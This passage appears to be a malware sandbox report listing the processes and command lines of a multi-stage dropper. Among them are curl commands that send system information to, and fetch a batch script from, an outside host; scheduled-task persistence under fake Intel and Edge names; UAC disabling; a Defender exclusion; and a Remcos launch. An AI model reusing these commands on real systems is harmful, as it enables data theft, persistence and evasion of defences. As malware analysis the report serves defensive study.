PID 5008 wrote to memory of 3540 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 3540 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3128 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 3128 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 5008 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 4740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 4740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5008 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5008 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 5008 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 1364 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1364 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1364 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1364 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1364 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1364 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1364 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1364 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe
PID 1932 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe
PID 4884 wrote to memory of 1112 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 4884 wrote to memory of 1112 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 3128 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3128 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3128 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3128 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3128 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3128 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3128 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 3128 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 3128 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 3128 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 3128 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 3324 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 3324 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 3128 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 3128 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 3128 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 1756 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe C:\Windows\system32\cmd.exe
PID 1756 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe C:\Windows\system32\cmd.exe
PID 2756 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2756 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3128 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Users\Admin\AppData\Local\Temp\a\random.exe

"C:\Users\Admin\AppData\Local\Temp\a\random.exe"

C:\Users\Admin\AppData\Local\Temp\a\client.exe

"C:\Users\Admin\AppData\Local\Temp\a\client.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe

"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"

C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe

"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe

"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe

"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\9000Z5FCBIE3" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe

"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe

"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpF027.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpF027.tmp.bat

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe

"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\a\RMX.exe

"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\XTR9HDBSJMYU" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe

"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"

C:\Windows\System32\certutil.exe

"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp2989.tmp"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe

"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\888.exe

"C:\Users\Admin\AppData\Local\Temp\a\888.exe"

C:\Users\Admin\AppData\Local\Temp\a\50to.exe

"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

